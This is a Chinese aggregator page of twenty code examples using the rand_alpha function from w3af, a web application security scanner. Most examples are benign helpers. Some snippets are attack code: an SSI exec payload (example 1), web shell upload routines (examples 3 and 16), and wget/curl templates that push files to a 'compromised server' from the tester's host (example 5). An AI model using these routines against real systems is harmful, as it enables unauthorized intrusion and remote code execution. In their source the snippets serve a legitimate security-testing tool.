本文整理汇总了Python中w3af.core.data.fuzzer.utils.rand_alpha函数的典型用法代码示例。如果您正苦于以下问题:Python rand_alpha函数的具体用法?Python rand_alpha怎么用?Python rand_alpha使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了rand_alpha函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。
示例1: _get_ssi_strings
def _get_ssi_strings(self):
"""
This method returns a list of server sides to try to include.
:return: A string, see above.
"""
yield '<!--#exec cmd="echo -n %s;echo -n %s" -->' % (rand_alpha(5), rand_alpha(5))
开发者ID:masterapocalyptic,项目名称:Tortazo-spanishtranslate,代码行数:7,代码来源:ssi.py
示例2: _get_table_prefix
def _get_table_prefix(self, table_prefix):
if table_prefix is None:
table_prefix = 'cached_disk_dict_%s' % rand_alpha(16)
else:
args = (table_prefix, rand_alpha(16))
table_prefix = 'cached_disk_dict_%s_%s' % args
return table_prefix
开发者ID:andresriancho,项目名称:w3af,代码行数:8,代码来源:cached_disk_dict.py
示例3: _get_web_shells
def _get_web_shells(self, extension):
"""
:yield: Tuples with file_content and file_name for web shells.
"""
for shell_str, orig_extension in shell_handler.get_webshells(extension):
# If the webshell was webshell.php this will return a file_name
# containing kgiwjxh.php (8 rand and the extension)
file_name = '%s.%s' % (rand_alpha(8), orig_extension)
yield shell_str, file_name
# Now we want to return the webshell content <?php ... ?> but in a
# file with the extension that the upload URL had. This makes our
# chances of getting access a little greater
file_name = '%s.%s' % (rand_alpha(8), extension)
yield shell_str, file_name
开发者ID:ElAleyo,项目名称:w3af,代码行数:15,代码来源:file_upload.py
示例4: audit
def audit(self, freq, orig_response):
"""
Searches for file upload vulns using a POST to author.dll.
:param freq: A FuzzableRequest
"""
domain_path = freq.get_url().get_domain_path()
if kb.kb.get(self, 'frontpage'):
# Nothing to do, I have found vuln(s) and I should stop on first
msg = 'Not verifying if I can upload files to: "%s" using'\
' author.dll. Because I already found a vulnerability.'
om.out.debug(msg)
return
# I haven't found any vulns yet, OR i'm trying to find every
# directory where I can write a file.
if domain_path not in self._already_tested:
self._already_tested.add(domain_path)
# Find a file that doesn't exist and then try to upload it
for _ in xrange(3):
rand_file = rand_alpha(5) + '.html'
rand_path_file = domain_path.url_join(rand_file)
res = self._uri_opener.GET(rand_path_file)
if is_404(res):
upload_id = self._upload_file(domain_path, rand_file)
self._verify_upload(domain_path, rand_file, upload_id)
break
else:
msg = 'frontpage plugin failed to find a 404 page. This is'\
' mostly because of an error in 404 page detection.'
om.out.error(msg)
开发者ID:3rdDegree,项目名称:w3af,代码行数:33,代码来源:frontpage.py
示例5: transfer
def transfer(self, data_str, destination):
"""
This method is used to transfer the data_str from w3af to the compromised server.
"""
if not self._command:
self.can_transfer()
commandTemplates = {}
commandTemplates['wget'] = 'wget http://%s:%s/%s -O %s'
commandTemplates['lynx'] = 'lynx -source http://%s:%s/%s > %s'
commandTemplates['curl'] = 'curl http://%s:%s/%s > %s'
# Create the file
filename = rand_alpha(10)
file_path = get_temp_dir() + os.path.sep + filename
f = file(file_path, 'w')
f.write(data_str)
f.close()
# Start a web server on the inbound port and create the file that
# will be fetched by the compromised host
webserver.start_webserver(cf.cf.get('local_ip_address'),
self._inbound_port,
get_temp_dir())
commandToRun = commandTemplates[self._command] % \
(cf.cf.get('local_ip_address'), self._inbound_port,
filename, destination)
self._exec_method(commandToRun)
os.remove(file_path)
return self.verify_upload(data_str, destination)
开发者ID:Daisymei,项目名称:w3af,代码行数:33,代码来源:clientless_reverse_http.py
示例6: __init__
def __init__(self, table_prefix=None, dump=None, load=None):
"""
:param table_prefix: The DBMS table prefix, mostly for debugging.
:param dump: The function to use to serialize the object
:param load: The function to use to deserialize the object
"""
self.db = get_default_temp_db_instance()
prefix = '' if table_prefix is None else ('%s_' % table_prefix)
self.table_name = 'disk_list_' + prefix + rand_alpha(30)
self.dump = dump
self.load = load
# Create table
# DO NOT add the AUTOINCREMENT flag to the table creation since that
# will break __getitem__ when an item is removed, see:
# http://www.sqlite.org/faq.html#q1
columns = [('index_', 'INTEGER'),
('eq_attrs', 'TEXT'),
('pickle', 'BLOB')]
pks = ['index_']
self.db.create_table(self.table_name, columns, pks)
self.db.create_index(self.table_name, ['eq_attrs'])
self.db.commit()
self._state = OPEN
开发者ID:andresriancho,项目名称:w3af,代码行数:28,代码来源:disk_list.py
示例7: setup
def setup(self):
"""
Setup all the required backend stores. This was mostly created to avoid
starting any threads during __init__() which is called during python's
import phase and dead-locks in some cases.
:return: None
"""
with self._kb_lock:
if self.initialized:
return
self.urls = DiskSet(table_prefix='kb_urls')
self.fuzzable_requests = DiskSet(table_prefix='kb_fuzzable_requests')
self.db = get_default_persistent_db_instance()
self.table_name = 'knowledge_base_' + rand_alpha(30)
self.db.create_table(self.table_name, self.COLUMNS)
self.db.create_index(self.table_name, ['location_a', 'location_b'])
self.db.create_index(self.table_name, ['uniq_id'])
self.db.commit()
# Only initialize once
self.initialized = True
开发者ID:0x554simon,项目名称:w3af,代码行数:25,代码来源:knowledge_base.py
示例8: create_mutants
def create_mutants(freq, mutant_str_list, fuzzable_param_list,
append, fuzzer_config):
"""
This is a very important method which is called in order to create
mutants. Usually called from fuzzer.py module.
"""
if not 'fuzz_form_files' in fuzzer_config:
return []
if not isinstance(freq, HTTPPostDataRequest):
return []
file_vars = freq.get_file_vars()
if not file_vars:
return []
fake_file_objs = []
ext = fuzzer_config['fuzzed_files_extension']
for mutant_str in mutant_str_list:
if isinstance(mutant_str, basestring):
# I have to create the NamedStringIO with a "name".
# This is needed for MultipartPostHandler
fname = "%s.%s" % (rand_alpha(7), ext)
str_file = NamedStringIO(mutant_str, name=fname)
fake_file_objs.append(str_file)
res = Mutant._create_mutants_worker(freq, FileContentMutant,
fake_file_objs,
file_vars,
append, fuzzer_config)
return res
开发者ID:3rdDegree,项目名称:w3af,代码行数:32,代码来源:filecontent_mutant.py
示例9: audit
def audit(self, freq, orig_response, debugging_id):
"""
Searches for file upload vulns using a POST to author.dll.
:param freq: A FuzzableRequest
:param orig_response: The HTTP response associated with the fuzzable request
:param debugging_id: A unique identifier for this call to audit()
"""
# Only run if we have the author URL for this frontpage instance
if self._get_author_url() is None:
return
# Only identify one vulnerability of this type
if kb.kb.get(self, 'frontpage'):
return
domain_path = freq.get_url().get_domain_path()
# Upload only once to each directory
if domain_path in self._already_tested:
return
self._already_tested.add(domain_path)
rand_file = rand_alpha(6) + '.html'
upload_id = self._upload_file(domain_path, rand_file, debugging_id)
self._verify_upload(domain_path, rand_file, upload_id, debugging_id)
开发者ID:foobarmonk,项目名称:w3af,代码行数:27,代码来源:frontpage.py
示例10: _PUT
def _PUT(self, domain_path):
"""
Tests PUT method.
"""
# upload
url = domain_path.url_join(rand_alpha(5))
rnd_content = rand_alnum(6)
headers = Headers([('content-type', 'text/plain')])
put_response = self._uri_opener.PUT(url, data=rnd_content,
headers=headers)
# check if uploaded
res = self._uri_opener.GET(url, cache=True)
if res.get_body() == rnd_content:
msg = 'File upload with HTTP PUT method was found at resource:' \
' "%s". A test file was uploaded to: "%s".'
msg = msg % (domain_path, res.get_url())
v = Vuln('Insecure DAV configuration', msg, severity.HIGH,
[put_response.id, res.id], self.get_name())
v.set_url(url)
v.set_method('PUT')
self.kb_append(self, 'dav', v)
# Report some common errors
elif put_response.get_code() == 500:
msg = 'DAV seems to be incorrectly configured. The web server' \
' answered with a 500 error code. In most cases, this means'\
' that the DAV extension failed in some way. This error was'\
' found at: "%s".' % put_response.get_url()
i = Info('DAV incorrect configuration', msg, res.id, self.get_name())
i.set_url(url)
i.set_method('PUT')
self.kb_append(self, 'dav', i)
# Report some common errors
elif put_response.get_code() == 403:
msg = 'DAV seems to be correctly configured and allowing you to'\
' use the PUT method but the directory does not have the'\
' correct permissions that would allow the web server to'\
' write to it. This error was found at: "%s".'
msg = msg % put_response.get_url()
i = Info('DAV incorrect configuration', msg,
[put_response.id, res.id], self.get_name())
i.set_url(url)
i.set_method('PUT')
self.kb_append(self, 'dav', i)
开发者ID:ElAleyo,项目名称:w3af,代码行数:56,代码来源:dav.py
示例11: can_exploit
def can_exploit(self, opener):
rand = rand_alpha(8)
cmd = self.generate_command('echo %s|rev' % rand)
# For some reason that I don't care about, rev adds a \n to the string
# it reverses, even when I run the echo with "-n".
expected_output = '%s\n' % rand[::-1]
http_response = self.send(cmd, opener)
return expected_output == self.extract_result(http_response)
开发者ID:3rdDegree,项目名称:w3af,代码行数:10,代码来源:os_commanding.py
示例12: get_file_from_template
def get_file_from_template(extension):
file_name = "%s.%s" % (rand_alpha(7), extension)
template_file = os.path.join(TEMPLATE_DIR, 'template.%s' % extension)
if os.path.exists(template_file):
file_content = file(template_file).read()
success = True
else:
file_content = rand_alnum(64)
success = False
return success, file_content, file_name
开发者ID:3rdDegree,项目名称:w3af,代码行数:12,代码来源:file_templates.py
示例13: __init__
def __init__(self):
AuditPlugin.__init__(self)
# Create some random strings, which the plugin will use.
# for the fuzz_with_echo
self._rnd = rand_alpha(5)
self._rnd = self._rnd.lower()
self._expected_result = self._rnd * self.PRINT_REPEATS
# User configured parameters
self._use_time_delay = True
self._use_echo = True
开发者ID:3rdDegree,项目名称:w3af,代码行数:12,代码来源:eval.py
示例14: _fingerprint_SecureIIS
def _fingerprint_SecureIIS(self, fuzzable_request):
"""
Try to verify if SecureIIS is installed or not.
"""
# And now a final check for SecureIIS
headers = fuzzable_request.get_headers()
headers['Transfer-Encoding'] = rand_alpha(1024 + 1)
try:
lock_response2 = self._uri_opener.GET(fuzzable_request.get_url(),
headers=headers, cache=True)
except BaseFrameworkException, w3:
om.out.debug(
'Failed to identify secure IIS, exception: ' + str(w3))
开发者ID:0x554simon,项目名称:w3af,代码行数:13,代码来源:fingerprint_WAF.py
示例15: _fingerprint_URLScan
def _fingerprint_URLScan(self, fuzzable_request):
"""
Try to verify if URLScan is installed or not.
"""
# detect using GET
# Get the original response
orig_response = self._uri_opener.GET(
fuzzable_request.get_url(), cache=True)
if orig_response.get_code() != 404:
# Now add the if header and try again
headers = fuzzable_request.get_headers()
headers['If'] = rand_alpha(8)
if_response = self._uri_opener.GET(fuzzable_request.get_url(),
headers=headers,
cache=True)
headers = fuzzable_request.get_headers()
headers['Translate'] = rand_alpha(8)
translate_response = self._uri_opener.GET(
fuzzable_request.get_url(),
headers=headers,
cache=True)
headers = fuzzable_request.get_headers()
headers['Lock-Token'] = rand_alpha(8)
lock_response = self._uri_opener.GET(fuzzable_request.get_url(),
headers=headers,
cache=True)
headers = fuzzable_request.get_headers()
headers['Transfer-Encoding'] = rand_alpha(8)
transfer_enc_response = self._uri_opener.GET(
fuzzable_request.get_url(),
headers=headers,
cache=True)
if if_response.get_code() == 404 or translate_response.get_code() == 404 or\
lock_response.get_code() == 404 or transfer_enc_response.get_code() == 404:
self._report_finding('URLScan', lock_response)
开发者ID:0x554simon,项目名称:w3af,代码行数:38,代码来源:fingerprint_WAF.py
示例16: _verify_vuln
def _verify_vuln(self, vuln_obj):
"""
This command verifies a vuln. This is really hard work! :P
:return : True if vuln can be exploited.
"""
# Create the shell
filename = rand_alpha(7)
extension = vuln_obj.get_url().get_extension()
# I get a list of tuples with file_content and extension to use
shell_list = shell_handler.get_webshells(extension)
for file_content, real_extension in shell_list:
if extension == '':
extension = real_extension
om.out.debug('Uploading shell with extension: "%s".' % extension)
# Upload the shell
fname = '%s.%s' % (filename, extension)
url_to_upload = vuln_obj.get_url().url_join(fname)
om.out.debug(
'Uploading file %s using PUT method.' % url_to_upload)
self._uri_opener.PUT(url_to_upload, data=file_content)
# Verify if I can execute commands
# All w3af shells, when invoked with a blank command, return a
# specific value in the response:
# shell_handler.SHELL_IDENTIFIER
exploit_url = URL(url_to_upload + '?cmd=')
response = self._uri_opener.GET(exploit_url)
if shell_handler.SHELL_IDENTIFIER in response.get_body():
msg = 'The uploaded shell returned the SHELL_IDENTIFIER, which'\
' verifies that the file was uploaded and is being' \
' executed.'
om.out.debug(msg)
self._exploit_url = exploit_url
return True
else:
msg = 'The uploaded shell with extension: "%s" did NOT return'\
' the SHELL_IDENTIFIER, which means that the file was'\
' not uploaded to the remote server or the code is not'\
' being run. The returned body was: "%s".'
om.out.debug(msg % (extension, response.get_body()))
extension = ''
开发者ID:andresriancho,项目名称:w3af-kali,代码行数:47,代码来源:dav.py
示例17: __init__
def __init__(self):
self.db = get_default_temp_db_instance()
self.table_name = rand_alpha(30)
# Create table
# DO NOT add the AUTOINCREMENT flag to the table creation since that
# will break __getitem__ when an item is removed, see:
# http://www.sqlite.org/faq.html#q1
columns = [('index_', 'INTEGER'),
('eq_attrs', 'TEXT'),
('pickle', 'BLOB')]
pks = ['index_']
self.db.create_table(self.table_name, columns, pks)
self.db.create_index(self.table_name, ['eq_attrs',])
self.db.commit()
开发者ID:Adastra-thw,项目名称:Tortazo,代码行数:17,代码来源:disk_list.py
示例18: __init__
def __init__(self, table_prefix=None):
self.db = get_default_temp_db_instance()
prefix = '' if table_prefix is None else ('%s_' % table_prefix)
self.table_name = 'disk_dict_' + prefix + rand_alpha(30)
# Create table
# DO NOT add the AUTOINCREMENT flag to the table creation since that
# will break __getitem__ when an item is removed, see:
# http://www.sqlite.org/faq.html#q1
columns = [('index_', 'INTEGER'),
('key', 'BLOB'),
('value', 'BLOB')]
pks = ['index_']
self.db.create_table(self.table_name, columns, pks)
self.db.create_index(self.table_name, ['key'])
self.db.commit()
开发者ID:0x554simon,项目名称:w3af,代码行数:18,代码来源:disk_dict.py
示例19: validate
def validate(self, value):
expanded_path = os.path.expanduser(value)
# This is useful for testing, the user specifies a script with $rnd$ in the
# output file name, w3af will replace that string with 5 random chars.
#
# The user can then run the same script over and over without caring about
# overwriting his output files.
rnd = rand_alpha(5)
value = expanded_path = expanded_path.replace('$rnd$', rnd)
directory = os.path.abspath(os.path.dirname(expanded_path))
if os.path.isdir(expanded_path):
msg = 'Invalid output file "%s", it must not be a directory.'
raise BaseFrameworkException(msg % value)
if not os.path.isdir(directory):
msg = ('Invalid file option "%s", the directory "%s" does'
' not exist.')
raise BaseFrameworkException(msg % (value, directory))
if not os.access(directory, os.W_OK):
msg = ('Invalid file option "%s", the user does not have'
' enough permissions to write to the specified directory.')
raise BaseFrameworkException(msg % value)
if os.path.exists(value):
if not os.access(value, os.W_OK):
msg = ('Invalid file option "%s", the user does not have'
' enough permissions to write to the file.')
raise BaseFrameworkException(msg % value)
# Please note the following:
# >>> os.path.abspath(os.path.dirname(''))
# '/home/foobar/workspace/threading2'
#
# This is why we need this check:
if value == '':
msg = 'Invalid file option, you have to specify a non-empty value.'
raise BaseFrameworkException(msg)
return value
开发者ID:andresriancho,项目名称:w3af,代码行数:44,代码来源:output_file_option.py
示例20: _check_existance
def _check_existance(self, original_response, mutant):
"""
Actually check if the mutated URL exists.
:return: None, all important data is put() to self.output_queue
"""
response = self._uri_opener.send_mutant(mutant)
if not is_404(response) and relative_distance_lt(original_response.body, response.body, 0.85):
# Verify against something random
rand = rand_alpha()
rand_mutant = mutant.copy()
rand_mutant.set_mod_value(rand)
rand_response = self._uri_opener.send_mutant(rand_mutant)
if relative_distance_lt(response.body, rand_response.body, 0.85):
for fr in self._create_fuzzable_requests(response):
self.output_queue.put(fr)
开发者ID:masterapocalyptic,项目名称:Tortazo-spanishtranslate,代码行数:20,代码来源:wordnet.py
注:本文中的w3af.core.data.fuzzer.utils.rand_alpha函数示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
客服电话
APP下载
官方微信
请发表评论